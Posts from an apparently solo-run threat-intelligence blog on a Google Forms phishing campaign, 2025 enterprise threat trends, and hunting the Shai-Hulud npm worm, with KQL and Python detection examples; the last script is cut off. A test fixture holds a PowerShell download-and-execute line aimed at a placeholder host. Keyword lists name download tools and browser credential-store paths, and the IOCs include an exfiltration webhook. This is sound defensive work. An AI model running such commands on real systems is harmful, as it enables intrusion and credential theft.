A phishing campaign is impersonating Google Forms to steal Google account credentials using fake job opportunity lures. Victims are directed to URLs resembling legitimate Google Forms pages (e.g., forms.google.ss-o[.]com) that generate personalized links and present a convincing form requesting personal details. Clicking “Sign in” redirects users to a credential-harvesting page hosted on a known phishing domain.
Credential harvesters that masquerade as trusted brands, including adversary-in-the-middle (AiTM) kits, continue to evolve and remain an effective route to initial access and credential theft. Organisations should keep strengthening and updating email policies and filtering controls. User awareness remains crucial for detecting and reporting these phishing attacks early.
Changes in Behaviour
This campaign shows increased sophistication through personalized phishing URLs, realistic Google Forms cloning, and redirection tactics that hide the payload from researchers.
Attackers leverage job-themed lures and likely distribute links via targeted email or LinkedIn outreach, aligning with ongoing trends exploiting remote work opportunities.
This aligns with a broader trend of actors using social engineering through job offers or advertisements to exploit user trust via trusted platforms such as Google and LinkedIn. Similar techniques have been observed in campaigns conducted by groups such as Lazarus, which have orchestrated sophisticated social engineering operations via LinkedIn.
Campaign Behaviour
Threat actors use domain impersonation and dynamic link generation to tailor phishing pages to individual victims. The fake form mimics Google branding and legal disclaimers to build trust, while the sign-in process redirects victims to a credential harvesting site.
Visits that do not look like the intended victim (for example from researchers or scanners) are redirected to Google search pages, which hampers detection and analysis of the kit.
Indicators of Compromise (IOCs)
forms.google.ss-o[.]com
id-v4[.]com (inactive)
generation_form.php hosted on phishing infrastructure
Fake Google Forms job application pages requesting Google sign-in credentials
Note: Assume additional infrastructure and IOCs may be in use.
Recommendations to Organisations and Defenders
Budosec is a solo-owned blog and is not sponsored by any vendors. The advice provided is vendor-neutral. Exact remediation steps will depend on your tooling; however, the guidance below applies broadly.
Detection Opportunities
See my GitHub for detection and hunting queries you can use for this campaign
Initial indicators
User reports suspicious email
Clicks on shortened or suspicious URLs
Navigation to domains with malicious or newly registered reputation
Further downstream indicators
Anomalous sign-ins from unseen locations
Impossible travel events
Suspicious inbox forwarding rules created
New MFA method or device added
Creating detections that correlate multiple events within a short timeframe is effective. Threat actors typically move quickly to establish persistence, expand access, and exfiltrate data.
Threat Hunting Guidance
Using dnstwist, defenders can generate permutations of the Google domains the campaign imitates (google.com, forms.google.com) and hunt for them across DNS, proxy and email logs for the last 90 days (or as far back as log retention allows). Also hunt for hostnames that embed the brand under a different registrable domain, as forms.google.ss-o[.]com does; a pure permutation list will not catch that pattern.
If using Microsoft Sentinel or similar platforms, run retrospective searches for these domains.
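The hunt described above can be scripted end to end. The Python below is an added example, not code from this blog or from the dnstwist project: it builds a small set of typosquat permutations (a simplified stand-in for dnstwist's fuzzers), adds the campaign's known IOCs, and runs both checks plus a brand-in-hostname check over constructed DNS log lines. The log lines, host names and the permutation rules are assumptions for the example; the naive "last two labels" registrable-domain rule should be replaced by a Public Suffix List lookup in production.

```python
from typing import Optional

BRAND = "google"
BRAND_DOMAIN = "google.com"
# Registrable domains that are genuinely Google-owned and must never be flagged.
LEGIT_REGISTRABLE = {"google.com", "googleusercontent.com", "googleapis.com", "gstatic.com"}
# IOCs reported for this campaign (defanging removed so they match raw log data).
KNOWN_IOCS = {"forms.google.ss-o.com", "id-v4.com"}

# Constructed sample DNS log lines (not real telemetry): timestamp, host, "query", fqdn, record type.
SAMPLE_DNS_LOG = """\
2025-11-03T09:12:44Z host01 query forms.google.com A
2025-11-03T09:13:02Z host07 query forms.google.ss-o.com A
2025-11-03T09:14:10Z host07 query id-v4.com A
2025-11-03T09:15:51Z host03 query gooogle.com A
2025-11-03T09:16:22Z host03 query accounts.google.com A
2025-11-03T09:17:05Z host12 query google-forms.com A
2025-11-03T09:18:40Z host12 query docs.googleusercontent.com A
2025-11-03T09:19:01Z host05 query go0gle.com A
"""

HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "g": "q", "a": "4"}


def permutations(domain):
    """Simplified stand-in for dnstwist's fuzzers: omission, repetition, homoglyph,
    hyphenation and transposition permutations of the leftmost label."""
    label, tld = domain.split(".", 1)
    out = set()
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:] + "." + tld)              # omission
        out.add(label[:i] + label[i] + label[i:] + "." + tld)       # repetition
        if label[i] in HOMOGLYPHS:                                   # homoglyph
            out.add(label[:i] + HOMOGLYPHS[label[i]] + label[i + 1:] + "." + tld)
        if i:                                                        # hyphenation
            out.add(label[:i] + "-" + label[i:] + "." + tld)
        if i < len(label) - 1:                                       # transposition
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:] + "." + tld)
    out.discard(domain)
    return out


def registrable(fqdn):
    # Naive last-two-labels rule; use the Public Suffix List in a real hunt.
    return ".".join(fqdn.split(".")[-2:])


def classify(fqdn, lookalikes) -> Optional[str]:
    fqdn = fqdn.lower().rstrip(".")
    reg = registrable(fqdn)
    if fqdn in KNOWN_IOCS or reg in KNOWN_IOCS:
        return "known-ioc"
    if reg in LEGIT_REGISTRABLE:
        return None                  # Google-owned, whatever the subdomain
    if reg in lookalikes:
        return "lookalike"           # typosquat of google.com
    if BRAND in fqdn:
        return "brand-in-hostname"   # e.g. forms.google.<attacker-domain>
    return None


def hunt(log_text, lookalikes):
    """Return (host, fqdn, verdict) for every query that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[2] != "query":
            continue
        verdict = classify(parts[3], lookalikes)
        if verdict:
            hits.append((parts[1], parts[3], verdict))
    return hits


if __name__ == "__main__":
    for host, fqdn, why in hunt(SAMPLE_DNS_LOG, permutations(BRAND_DOMAIN)):
        print(f"{host}\t{fqdn}\t{why}")
```

The brand-in-hostname rule is the one that catches this campaign: forms.google.ss-o.com is not a permutation of any Google domain, so a dnstwist list alone would miss it. Expect the rule to be noisy on legitimate third parties that embed "google" in a hostname; triage by registrable domain age and reputation.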
If IOCs are found:
Remove malicious emails from user inboxes
Block associated domains and infrastructure
If click-through activity is observed, follow up with the user immediately to determine whether credentials were entered.
If Credentials Were Entered
If a user entered credentials into a suspected phishing or AiTM page, treat the account as compromised immediately:
Force a password reset
Revoke all active sessions and refresh tokens to invalidate stolen cookies
Require reauthentication and re-register MFA methods
Remove unrecognized devices or security info changes
Review recent sign-ins for unfamiliar IPs, impossible travel, or anonymous proxy use
Audit and remove suspicious inbox rules, OAuth app consents, and forwarding settings
Check for data access anomalies and unauthorized downloads
Instruct the user to report unexpected MFA prompts
Monitor closely for follow-up activity or lateral movement attempts
2025 showed clear, practical shifts in what actually hurts enterprises day-to-day: identity and user execution were the most common paths for threat actors. For most enterprise environments the year wasn’t packed with advanced persistent threat (APT) tradecraft. It was about scale: AI-assisted social engineering, commodity malware delivered through trusted platforms, and “make the user do it” ClickFix-style execution chains that bypass controls.
What stood out most in 2025 was how heavily attackers leaned into trusted surfaces — Microsoft 365, Teams, browser sessions, GitHub/CDN-style hosting, and advertising platforms — while running the same repeatable playbooks at scale: infostealers to harvest credentials and tokens, followed by initial access, then ransomware or business email compromise (BEC). This wasn’t about novel tradecraft; it was about efficiency. Microsoft’s reporting and ENISA’s 2025 threat landscape both reinforce this shift, highlighting the growing scale of social engineering, faster exploitation cycles, and the increasing abuse of legitimate services as core drivers of modern enterprise compromise.
For obvious reasons I cannot be too specific; below are the patterns I saw repeatedly across 2025, and why they matter.
1) Infostealers
What changed in 2025
Infostealers aren’t “just password grabbers” anymore; they’re an access factory. Malware-as-a-service (MaaS) ecosystems like Lumma kept showing up with flexible delivery, fast iteration, and reliable theft of browser data and session material that fuels downstream compromise.
How it showed up in enterprise
Initial access increasingly looked like “valid login + normal tools” because creds/tokens were already stolen.
Infostealers arrived via malvertising/redirect chains and were often staged on “normal looking” platforms (including developer/hosting ecosystems). Microsoft documented large-scale malvertising leading victims through redirectors and ultimately to payload hosting on platforms like GitHub.
Practical takeaways
Treat session theft as a first-class risk. In practice, conditional access, token protection, and device compliance matter far more than complexity-based password policies. Defenders should prioritise detections for unusual access to browser credential stores, new persistence mechanisms appearing after “user-initiated” installer activity, and outbound connections to fresh or low-reputation infrastructure immediately following a download or ZIP execution.
Tips for hunting in Kusto Query Language (KQL)
Look for payloads being pulled from the internet
// Sentinel uses TimeGenerated; in Defender advanced hunting the column is Timestamp
DeviceProcessEvents
| where TimeGenerated >= ago(7d)
| where FileName in~ ("powershell.exe", "mshta.exe", "msbuild.exe", "rundll32.exe")
| where ProcessCommandLine has_any ("http", "https", "Invoke-WebRequest", "iwr", "curl", "wget", "DownloadString", "DownloadFile")
| project ProcTime = TimeGenerated, DeviceId, DeviceName, ProcessId, FileName, ProcessCommandLine
| join kind=inner (
    DeviceNetworkEvents
    | where TimeGenerated >= ago(7d)
    | where RemoteIPType == "Public" and ActionType == "ConnectionSuccess"
    | project NetTime = TimeGenerated, DeviceId, InitiatingProcessId, RemoteIP, RemoteUrl
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
// keep only connections made within 60 seconds of the process starting;
// joining on DeviceId alone pairs every process with every connection on the host
| where NetTime between (ProcTime .. (ProcTime + 60s))
| project ProcTime, DeviceName, FileName, ProcessCommandLine, RemoteIP, RemoteUrl,
          SecondsAfterStart = datetime_diff("second", NetTime, ProcTime)
Look for non-browser processes touching credential stores
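The two hunts above ("payloads being pulled from the internet" and "non-browser processes touching credential stores") translate directly into correlation logic. The Python below is an added example, not code from this blog or from Microsoft: it runs both rules over constructed events shaped like simplified DeviceProcessEvents, DeviceNetworkEvents and DeviceFileEvents rows (field names are assumptions), pairing a LOLBin start with a public connection from the same process ID within 60 seconds, which is the constraint that stops a host-level join from pairing every process with every connection. The credential-store paths are the usual Chromium and Firefox locations; the sample hosts, IPs and command lines are made up.

```python
from datetime import datetime, timedelta

LOLBINS = {"powershell.exe", "mshta.exe", "msbuild.exe", "rundll32.exe"}
DOWNLOAD_MARKERS = ("http://", "https://", "invoke-webrequest", "iwr ", "curl ", "wget ",
                    "downloadstring", "downloadfile")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Chromium and Firefox credential/cookie stores as lower-case path fragments.
CRED_STORE_FRAGMENTS = ("\\login data", "\\cookies", "\\local state", "\\web data",
                        "\\logins.json", "\\key4.db")


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


# Constructed samples (not real telemetry). 203.0.113.0/24 and .invalid are reserved for documentation.
PROCESS_EVENTS = [
    {"time": "2025-09-02T10:15:01Z", "device": "WS-042", "pid": 4412, "file": "powershell.exe",
     "cmd": "powershell -w hidden -c \"iwr https://cdn.update-check.invalid/a.ps1 | iex\""},
    {"time": "2025-09-02T10:15:30Z", "device": "WS-042", "pid": 5120, "file": "powershell.exe",
     "cmd": "powershell -File C:\\scripts\\inventory.ps1"},
    {"time": "2025-09-02T10:20:00Z", "device": "WS-011", "pid": 3030, "file": "rundll32.exe",
     "cmd": "rundll32 shell32.dll,Control_RunDLL https://203.0.113.77/x.cpl"},
]
NETWORK_EVENTS = [
    {"time": "2025-09-02T10:15:04Z", "device": "WS-042", "pid": 4412, "remote_ip": "203.0.113.50",
     "remote_url": "cdn.update-check.invalid", "ip_type": "Public", "action": "ConnectionSuccess"},
    {"time": "2025-09-02T10:15:33Z", "device": "WS-042", "pid": 5120, "remote_ip": "10.0.0.5",
     "remote_url": "", "ip_type": "Private", "action": "ConnectionSuccess"},
    # 11 minutes after the rundll32 start: outside the correlation window, so not paired
    {"time": "2025-09-02T10:31:00Z", "device": "WS-011", "pid": 3030, "remote_ip": "203.0.113.77",
     "remote_url": "", "ip_type": "Public", "action": "ConnectionSuccess"},
]
FILE_EVENTS = [
    {"time": "2025-09-02T10:16:10Z", "device": "WS-042", "proc": "chrome.exe",
     "path": "C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"time": "2025-09-02T10:16:12Z", "device": "WS-042", "proc": "update.exe",
     "path": "C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"time": "2025-09-02T10:16:13Z", "device": "WS-042", "proc": "update.exe",
     "path": "C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"},
    {"time": "2025-09-02T10:18:00Z", "device": "WS-011", "proc": "explorer.exe",
     "path": "C:\\Users\\kroe\\Documents\\notes.txt"},
]


def payload_pulls(process_events, network_events, window=timedelta(seconds=60)):
    """LOLBin launched with a download-style command line, followed within `window` by a
    successful connection to a public address from the same process on the same device."""
    hits = []
    for p in process_events:
        cmd = p["cmd"].lower()
        if p["file"].lower() not in LOLBINS or not any(m in cmd for m in DOWNLOAD_MARKERS):
            continue
        for n in network_events:
            if (n["device"], n["pid"]) != (p["device"], p["pid"]):
                continue
            if n["ip_type"] != "Public" or n["action"] != "ConnectionSuccess":
                continue
            delta = _ts(n["time"]) - _ts(p["time"])
            if timedelta(0) <= delta <= window:
                hits.append({"device": p["device"], "file": p["file"], "cmd": p["cmd"],
                             "remote_ip": n["remote_ip"], "remote_url": n["remote_url"],
                             "seconds_after_start": int(delta.total_seconds())})
    return hits


def credential_store_access(file_events):
    """Any non-browser process reading browser credential or cookie stores."""
    return [e for e in file_events
            if e["proc"].lower() not in BROWSERS
            and any(frag in e["path"].lower() for frag in CRED_STORE_FRAGMENTS)]


if __name__ == "__main__":
    for h in payload_pulls(PROCESS_EVENTS, NETWORK_EVENTS):
        print("payload pull:", h)
    for e in credential_store_access(FILE_EVENTS):
        print("credential store access:", e["device"], e["proc"], e["path"])
```

Tune the process allow-list for the second rule per environment (backup agents and password managers legitimately read these files); the signal is a process that has never read them before, not the read itself.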
2) AI-assisted social engineering
What changed in 2025
The big change wasn’t that AI invented new attack vectors (that is starting to change); it lowered the effort needed to produce high-volume, high-quality lures and impersonation content. Microsoft’s Digital Defence reporting explicitly calls out AI-enabled phishing and fast-evolving multi-stage chains as a key theme. ([Microsoft][1])
ENISA’s 2025 threat landscape also flags AI as a defining element, particularly around social engineering at scale. ([ENISA][4])
New reports and research on how AI is expected to keep changing the industry are being released constantly; the practical effects so far:
Faster iteration: lure themes changed weekly, not quarterly.
More multi-channel delivery (email + messaging + calls), which links directly to the next sections.
Practical takeaways
Stop relying on “users will spot bad grammar” as a control.
Harden identity workflows: phishing-resistant MFA where possible, stronger verification for payment/invoice changes, and out-of-band verification procedures that don’t depend on the same compromised channel.
AI and business email compromise (BEC) is a lethal combination. Users should feel comfortable reporting anything that seems out of place.
Investigation tips:
Check email context in the business environment
Does it relate to the recipient user’s role? (IMPORTANT: this does not mean it is benign, but it forms part of your investigation.)
Pull the email in line with your organisation’s arrangements for viewing emails
– Look for any signs of spoofing in email authentication (SPF, DKIM and DMARC results, and whether Return-Path and Reply-To align with the From domain)
– Analyse links and attachments (IMPORTANT: links or attachments may not work in sandboxed environments; this is by threat actor design, don’t assume benign)
– Look for suspicious redirections or cloned sites whose branding does not line up with the domain in the URL field.
– If suspicious, move to the next phase and check whether the user interacted with or downloaded anything.
EmailEvents
| where TimeGenerated >= ago(90d)
| where SenderFromAddress =~ "<insert email>" or SenderMailFromAddress =~ "<insert email>"
| project TimeGenerated, RecipientEmailAddress, Subject, SenderFromAddress, SenderMailFromAddress, DeliveryAction, DeliveryLocation, AttachmentCount, UrlCount
// customise as you see fit; establishing context is important, but again it is not an indication of benign
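The authentication and alignment checks in the investigation steps above can be scripted. The Python below is an added example, not code from this blog: using only the standard library, it parses a message, reads the Authentication-Results header, checks that Reply-To and Return-Path align with the From domain, and flags URLs whose hostname embeds the sender's brand under a different registrable domain (the cloned-site pattern). Both sample messages are constructed, the sender IP and domains use reserved documentation values, and the "last two labels" registrable-domain rule is a naive stand-in for the Public Suffix List.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed sample (not a real email): CEO-impersonation lure that fails authentication.
SUSPICIOUS_RAW = """\
Authentication-Results: mx.example.com;
 spf=fail (sender IP is 198.51.100.23) smtp.mailfrom=bounce.invoice-portal.invalid;
 dkim=none;
 dmarc=fail action=quarantine header.from=example.com
From: "Jane Doe (CEO)" <jane.doe@example.com>
Reply-To: jane.doe.ceo@gmail-mail.invalid
Return-Path: <payroll@bounce.invoice-portal.invalid>
To: alice@example.com
Subject: Urgent: update of supplier bank details
Content-Type: text/plain

Hi Alice, please update Acme's bank details before 5pm today.
Confirm here: https://example.com.login-verify.invalid/secure
"""

# Constructed clean counterpart: everything passes and is aligned with the From domain.
CLEAN_RAW = """\
Authentication-Results: mx.example.com;
 spf=pass smtp.mailfrom=bounce.example.com;
 dkim=pass header.d=example.com;
 dmarc=pass action=none header.from=example.com
From: "Jane Doe" <jane.doe@example.com>
Return-Path: <bounces@bounce.example.com>
To: alice@example.com
Subject: Q3 planning doc
Content-Type: text/plain

Draft is at https://intranet.example.com/docs/q3-plan
"""


def _domain(addr):
    return parseaddr(addr)[1].rsplit("@", 1)[-1].lower()


def _registrable(host):
    # Naive last-two-labels rule; use the Public Suffix List in production.
    return ".".join(host.lower().split(".")[-2:])


def parse_auth_results(header):
    """Map spf/dkim/dmarc -> result from an Authentication-Results header value."""
    return {m.lower(): r.lower() for m, r in re.findall(r"\b(spf|dkim|dmarc)=([A-Za-z]+)", header or "")}


def assess(raw):
    """Return (code, detail) findings; an empty list means nothing looked spoofed."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    from_domain = _domain(str(msg.get("From", "")))

    auth = parse_auth_results(str(msg.get("Authentication-Results", "")))
    for method in ("spf", "dkim", "dmarc"):
        result = auth.get(method, "missing")
        if result != "pass":
            findings.append((f"{method.upper()}_{result.upper()}", f"{method}={result}"))

    reply_to = msg.get("Reply-To")
    if reply_to and _domain(str(reply_to)) != from_domain:
        findings.append(("REPLYTO_MISMATCH", f"{_domain(str(reply_to))} != {from_domain}"))

    return_path = msg.get("Return-Path")
    if return_path:
        rp_domain = _domain(str(return_path))
        if rp_domain != from_domain and not rp_domain.endswith("." + from_domain):
            findings.append(("RETURNPATH_MISALIGNED", f"{rp_domain} not aligned with {from_domain}"))

    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    for host in re.findall(r"https?://([^\s/]+)", body):
        # brand name present in the hostname but owned by a different registrable domain
        if from_domain in host.lower() and _registrable(host) != from_domain:
            findings.append(("LOOKALIKE_URL", host))
    return findings


if __name__ == "__main__":
    for code, detail in assess(SUSPICIOUS_RAW):
        print(f"{code}: {detail}")
    print("clean message findings:", assess(CLEAN_RAW))
```

A DMARC fail on a message that still reached the mailbox is itself a finding worth chasing: check the DMARC policy of the From domain and why the gateway did not enforce it.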
TIP: Being a good analyst is about coming to accurate decisions in a reasonable amount of time, and justifying why you have come to a verdict based on the evidence.
3) Impersonation via WhatsApp and social media (trust hijack)
What changed in 2025
Attackers kept moving toward platforms where people respond quickly and that sit out of sight of security monitoring: WhatsApp, SMS, social media DMs, and other encrypted collaboration applications. Even when the exact scam mechanics vary, the consistent pattern is impersonation and urgency, or establishing trust via a high-profile identity such as a CEO.
How it showed up in enterprise
Finance/HR impersonation attempts outside email.
“Vendor” or “exec” outreach pushing invoice changes, gift cards, or urgent login steps.
Staff assuming WhatsApp/DM = “more legitimate” because it feels personal.
CEO or executive impersonation.
Practical takeaways
Write (and enforce) a policy: no financial approvals or credential workflows over consumer messaging apps.
Train staff to treat “new number, urgent request” as a default red flag and to verify via known channels.
4) Helpdesk phishing / identity resets
What changed in 2025
Threat groups kept proving that the helpdesk is a privileged access path. If an attacker can get a password reset or MFA change approved, they don’t need malware.
Australia’s ASD/ACSC guidance on Scattered Spider explicitly calls out social engineering of IT helpdesks to reset passwords/MFA as a core technique. ([cyber.gov.au][6])
CrowdStrike also described Scattered Spider activity expanding targets in 2025 with consistent tradecraft, reinforcing how operationally “standard” helpdesk abuse has become. ([CrowdStrike][7])
How it showed up in enterprise
MFA resets and enrollment changes followed by rapid access to M365/SSO apps.
Attackers living inside collaboration platforms after identity takeover (including Teams/communications abuse). Microsoft discussed threats targeting Teams and how attackers leverage password resets/MFA control to operate. ([Microsoft][8])
Practical takeaways
Lock down helpdesk workflows:
Require strong identity verification for resets (not knowledge-based authentication (KBA) questions, which a social engineer can research).
Add “cool-off” periods or manager approval for MFA changes on privileged accounts.
Alert on MFA method changes + new device + new geo sequences.
5) Trojanised installers: ads and fake sites leading to stealers, loaders and RATs
What changed in 2025
Fake installers stayed brutally effective because they exploit normal behaviour (“I need this tool now”). The distribution got better: sponsored ads, SEO poisoning, and “looks real enough” landing pages.
Kaspersky described a macOS infostealer campaign using paid search ads and even abuse of shared AI chat links to lure users into running commands that install an infostealer/backdoor. ([me-en.kaspersky.com][9])
This is the same underlying enterprise lesson: users will trust what’s at the top of search results if it looks official.
One example is the fake PuTTY installers. PuTTY is a lightweight Windows tool that IT professionals use to make remote command-line connections to other systems, and recent campaigns have exploited its widespread use in enterprise environments (Arctic Wolf).
How it showed up in enterprise
Initial foothold via an infostealer, followed by remote access tooling or loader deployment.
Practical takeaways
Restrict execution of new/untrusted installers where possible (application control).
Browser controls matter: block known bad ad/redirect infrastructure, enforce safe browsing, and monitor for first-time installs from user profile/temp locations.
Sponsored malicious PuTTY advertisements. Image from Arctic Wolf
6) ClickFix (make the user run the payload)
What changed in 2025
ClickFix is one of the most important “enterprise reality” shifts: attackers intentionally add a human step (copy/paste or run a command) to bypass controls that are better at blocking automated droppers.
Microsoft broke down ClickFix as a social engineering technique: lure the user into executing a command, followed by the malware chain. ([Microsoft][10])
Huntress also documented ClickFix campaigns delivering infostealers (including Lumma and others), showing how it ties directly into the credential-theft economy. ([Huntress][11])
How it showed up in enterprise
Clipboard-driven PowerShell execution that looks like “the user did it” (because they did).
Practical takeaways
Train specifically on “never run commands from a webpage / email” (most training is too generic).
Detection focus: suspicious parent/child chains and command lines around PowerShell/mshta/msbuild/rundll32 triggered shortly after browser activity.
Fake verification page getting a user to open the Windows Run dialog and launch PowerShell. Image from Proofpoint
7) AiTM phishing using site clones / brand impersonation (MFA bypass remains common)
What changed in 2025
AiTM phishing stayed dominant because it beats basic MFA by stealing session cookies/tokens via reverse proxies and realistic clones.
Sekoia’s 2025 analysis highlights the scale and prevalence of AiTM kits (Tycoon 2FA and others) and notes rapid evolution in delivery formats (e.g., shifting attachment/link delivery techniques). ([Sekoia.io Blog][12])
Barracuda also discussed the volume and evolution of phishing-as-a-service and AiTM-style kits in 2025 targeting Microsoft 365. ([Barracuda Blog][13])
How it showed up in enterprise
Microsoft 365 account takeovers where the login looked legitimate (because it was proxied).
“New MFA prompt” fatigue exploited to complete the chain.
Practical takeaways
Push toward phishing-resistant MFA for high-risk users (where feasible).
Alert on sign-in from new device + token issuance + mailbox rules changes (classic post-phish behaviour).
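The helpdesk takeaway (MFA method change + new device + new geo) and the AiTM takeaway above (new device + token issuance + mailbox rule), like the earlier note on correlating several events in a short window, are the same detection: an anchor sign-in from an unseen device or country followed within minutes by a post-compromise action. The Python below is an added example, not code from this blog; it runs that sequence rule over constructed, normalised audit events against a constructed 30-day baseline of known devices and countries. Event field names and action names are assumptions for the example.

```python
from datetime import datetime, timedelta

# Constructed 30-day baseline of devices and countries each user has been seen from (not real data).
BASELINE = {
    "alice": {"devices": {"DEV-AL-1"}, "countries": {"AU"}},
    "bob":   {"devices": {"DEV-BO-1"}, "countries": {"AU"}},
    "carol": {"devices": {"DEV-CA-1"}, "countries": {"AU"}},
}

# Constructed, normalised identity audit events (not real telemetry).
SAMPLE_EVENTS = [
    {"time": "2025-10-14T08:02:11Z", "user": "alice", "action": "SignIn", "device": "DEV-AL-1", "country": "AU"},
    {"time": "2025-10-14T08:30:05Z", "user": "alice", "action": "SignIn", "device": "DEV-UNK-9", "country": "NG"},
    {"time": "2025-10-14T08:41:50Z", "user": "alice", "action": "MfaMethodAdded", "detail": "Authenticator app"},
    {"time": "2025-10-14T08:55:12Z", "user": "alice", "action": "InboxRuleCreated", "detail": "forward to external address"},
    # bob: new device but known country, and no follow-up action -> no alert
    {"time": "2025-10-14T09:10:00Z", "user": "bob", "action": "SignIn", "device": "DEV-BO-2", "country": "AU"},
    # carol: new country, but the MFA change is 3h25m later, outside the window -> no alert
    {"time": "2025-10-14T09:20:00Z", "user": "carol", "action": "SignIn", "device": "DEV-CA-1", "country": "US"},
    {"time": "2025-10-14T12:45:00Z", "user": "carol", "action": "MfaMethodAdded", "detail": "Phone"},
]

WINDOW = timedelta(minutes=60)
POST_COMPROMISE_ACTIONS = {"MfaMethodAdded", "DeviceRegistered", "InboxRuleCreated", "OAuthConsentGranted"}


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def correlate(events, baseline, window=WINDOW):
    """Anchor on a sign-in from an unseen device or country; alert only if the same user
    performs a post-compromise action within `window`. Severity is high when both the
    device and the country are new, medium when only one is."""
    events = sorted(events, key=lambda e: _ts(e["time"]))
    alerts = []
    for i, ev in enumerate(events):
        if ev["action"] != "SignIn":
            continue
        known = baseline.get(ev["user"], {"devices": set(), "countries": set()})
        new_device = ev["device"] not in known["devices"]
        new_country = ev["country"] not in known["countries"]
        if not (new_device or new_country):
            continue
        start = _ts(ev["time"])
        follow_ups = [
            e["action"] for e in events[i + 1:]
            if e["user"] == ev["user"]
            and e["action"] in POST_COMPROMISE_ACTIONS
            and _ts(e["time"]) - start <= window
        ]
        if not follow_ups:
            continue
        alerts.append({
            "user": ev["user"],
            "anchor_time": ev["time"],
            "new_device": new_device,
            "new_country": new_country,
            "actions": follow_ups,
            "severity": "high" if (new_device and new_country) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, BASELINE):
        print(alert)
```

In Sentinel the equivalent is SigninLogs joined to AuditLogs on the user with the baseline computed over a 30-day lookback. Keep the window short: the rule should fire on attacker speed (minutes from first login to persistence), not on a user who enrols a new phone a day after a normal sign-in.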
Wrap-up: the 2025 pattern in one line
2025 was the year attackers doubled down on identity and user execution while hiding behind trusted platforms and accelerating with AI-assisted scale. This has been my personal experience in my role across all of these threats; while there is some variation, it has been a consistent theme. I have not covered extensions in this blog, but I will go into more detail on malicious extensions in the next one.
Hopefully this blog has given new or aspiring analysts a firm idea of the threat environment, particularly in the enterprise. By staying up to date on threat intelligence and strategic shifts you will be a stronger defensive analyst and will move toward proactive security.
Hunting Shai-Hulud: Detecting the npm Supply-Chain Worm with Sentinel
Shai-Hulud is a self-replicating npm supply-chain worm that slipped malicious post-install scripts into popular packages to steal secrets like npm/GitHub tokens, cloud keys, and create/modify GitHub repos & workflows for exfiltration, and then auto-publish poisoned updates wherever it found additional npm tokens—letting it spread across the ecosystem. Initial tallies cited 100+ affected packages; subsequent advisories and vendor tracking raised the scope to hundreds (500+ reported in some counts), so teams should assume impact is still evolving.
Behaviour
The Shai-Hulud worm behaves as a malicious npm package payload that executes a post-install script to harvest secrets (npm tokens, GitHub tokens, API keys, cloud credentials), then exfiltrates them to attacker-controlled GitHub repos and webhooks. It goes further by creating malicious GitHub Actions workflows to continuously leak secrets, and it forcibly migrates private repositories into public attacker-owned repos with a “Shai-Hulud Migration” tag. Critically, if additional npm tokens are present, it will auto-publish infected versions of any accessible packages, giving it worm-like, self-propagating capabilities across the npm ecosystem.
This is a massive supply chain attack, and organisations that have not already done so should treat it as high priority. This article is a quick threat intelligence summary you can read, although plenty of other sources and research are available, and it walks through some KQL (Kusto Query Language) queries you can use to hunt for this activity. It may also be useful for new analysts who want to understand how to break threat intelligence or research articles down into actionable information for security operations.
Indicators of Compromise
Files & paths
/tmp/processor.sh — creates shai-hulud branch and uploads workflow payload.
/tmp/migrate-repos.sh — forces private repos → public “migration.”
Temp working dir observed: /tmp/github-migration (used during repo cloning).
GitHub artifacts / repo signals
Public repos named Shai-Hulud containing data.json (double-base64 secrets dump).
Repos with description “Shai-Hulud Migration” and -migration suffix (private → public flip). Look for a CreateEvent followed quickly by a PublicEvent.
Branches named shai-hulud created across impacted repos; hidden workflow commits under .github/workflows/*.yml.
Network / exfil endpoints
https://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 (noting free-tier deactivated after excessive activity; secrets may still appear in GitHub workflow logs).
Automated npm publish from unexpected actors/machines (worm propagation).
Creation/modification of .github/workflows/* followed by unusual GitHub API POST/PUT events.
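The file and repository IOCs above are also worth checking directly on developer workstations and CI runners, not only in SIEM telemetry. The Python below is an added example, not code from this blog or from any vendor advisory: it walks a checkout, reports every package.json lifecycle hook (the worm's entry point), follows a "node <file>.js" hook to the script it runs, and scans workflow YAML for the markers listed above. The package tree it builds is a constructed fixture with made-up package names; only the IOC markers come from this post.

```python
import json
import os
import tempfile

# Markers taken from the IOC list above (lower-cased for matching).
IOC_MARKERS = (
    "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7",
    "trufflehog",
    "shai-hulud",
    "processor.sh",
    "migrate-repos.sh",
)
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def _read(path):
    try:
        with open(path, encoding="utf-8", errors="ignore") as fh:
            return fh.read()
    except OSError:
        return ""


def _markers_in(text):
    low = text.lower()
    return [m for m in IOC_MARKERS if m in low]


def scan_tree(root):
    """Flag every install-time hook (review) and any hook, script or workflow that
    carries a known marker (high)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        in_workflows = os.path.join(".github", "workflows") in dirpath
        for name in files:
            path = os.path.join(dirpath, name)
            if name == "package.json":
                try:
                    pkg = json.loads(_read(path))
                except json.JSONDecodeError:
                    continue
                scripts = pkg.get("scripts") or {}
                for hook in LIFECYCLE_HOOKS:
                    if hook not in scripts:
                        continue
                    cmd = str(scripts[hook])
                    markers = _markers_in(cmd)
                    for token in cmd.split():          # follow "node bundle.js" into the script
                        if token.endswith(".js"):
                            markers += _markers_in(_read(os.path.join(dirpath, token)))
                    findings.append({"package": pkg.get("name", "?"), "path": path, "hook": hook,
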